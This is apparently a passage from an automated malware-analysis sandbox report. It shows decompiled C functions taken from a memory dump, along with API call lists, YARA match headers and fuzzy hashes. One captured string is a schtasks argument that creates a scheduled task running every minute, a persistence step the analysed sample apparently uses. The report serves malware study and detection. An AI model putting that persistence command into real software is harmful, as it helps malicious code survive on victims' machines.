                      								if(_t8 != 0) {
                      									goto L19;
                      								} else {
                      									return  &(_t8[0]);
                      								}
                      							}
                      						} else {
                      							goto L19;
                      						}
                      					}
                      				}
                      			}

                      APIs
                      • lstrlenW.KERNEL32(?,?,00401B24,?,00402163), ref: 004015ED
                      • StrChrW.SHLWAPI(?,00000030,?,00402163), ref: 0040164C
                      • StrChrW.SHLWAPI(?,0000004F,?,00402163), ref: 00401659
                      • StrChrW.SHLWAPI(?,00000049,?,00402163), ref: 00401666
                      • StrChrW.SHLWAPI(?,0000006C,?,00402163), ref: 00401673
                      Memory Dump Source
                      • Source File: 00000011.00000002.526837252.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: lstrlen
                      • String ID:
                      • API String ID: 1659193697-0
                      • Opcode ID: 3e839589a52552755556ab8f22701c2fd0b2083a19dd4434fe127b2f866be211
                      • Instruction ID: 3e9ba84da349abec412b177751d0e179ec05f8f4c812e93d197d81d4f79ec5ec
                      • Opcode Fuzzy Hash: 3e839589a52552755556ab8f22701c2fd0b2083a19dd4434fe127b2f866be211
                      • Instruction Fuzzy Hash: 65014CA114116117DB342E286C88A7B325D5B53790B1E4D37FA45F42F0D33FDD86598E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 87%
                      			E00402230(WCHAR** __ecx, WCHAR* __edx) {
                      				signed int _v8;
                      				WCHAR* _v12;
                      				signed int _t10;
                      				WCHAR* _t20;
                      				void* _t21;
                      				int _t30;
                      				signed int _t31;
                      				void** _t34;
                      
                      				_push(__ecx);
                      				_push(__ecx);
                      				_t34 = __ecx;
                      				_t20 = __edx;
                      				_v12 = __edx;
                      				if( *__ecx == 0) {
                      					_t30 = 0;
                      				} else {
                      					_t30 = lstrlenW( *__ecx);
                      				}
                      				_t10 = lstrlenW(_t20) + 1 + _t30;
                      				_v8 = _t10;
                      				_t21 = LocalAlloc(0x40, _t10 + _t10);
                      				_t31 = _v8;
                      				if(_t30 != 0) {
                      					E00401418(_t21, _t31,  *_t34);
                      				}
                      				if( *_t34 != 0) {
                      					GlobalFree( *_t34);
                      				}
                      				E0040219A(_t21, _t31, _v12);
                      				 *_t34 = _t21;
                      				 *((short*)(_t21 + _t31 * 2 - 2)) = 0;
                      				return 1;
                      			}

                      APIs
                      • lstrlenW.KERNEL32(?,00000044,?,00000000,?,?,?,00401385), ref: 00402246
                      • lstrlenW.KERNEL32(/C /create /F /sc minute /mo 1 /tn ",00000044,?,00000000,?,?,?,00401385), ref: 00402253
                      • LocalAlloc.KERNEL32(00000040,00000001,?,00401385), ref: 00402264
                      • GlobalFree.KERNEL32 ref: 00402285
                      Strings
                      • /C /create /F /sc minute /mo 1 /tn ", xrefs: 00402252
                      Memory Dump Source
                      • Source File: 00000011.00000002.526837252.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: lstrlen$AllocFreeGlobalLocal
                      • String ID: /C /create /F /sc minute /mo 1 /tn "
                      • API String ID: 3873415381-4285889591
                      • Opcode ID: 72bfcd3077b21f1446062c52c20ece7f535875c6e2425e4305ca62285ad8d2e4
                      • Instruction ID: af5ef97b17a61ce9545709a8689a814e0938973f1b89e85d1da4918992f5abef
                      • Opcode Fuzzy Hash: 72bfcd3077b21f1446062c52c20ece7f535875c6e2425e4305ca62285ad8d2e4
                      • Instruction Fuzzy Hash: 5C017171600205EFD7105FA9DD49B5ABAFAEFC8311F14447EE682F32A1DAB89C418664
                      Uniqueness

                      Uniqueness Score: -1.00%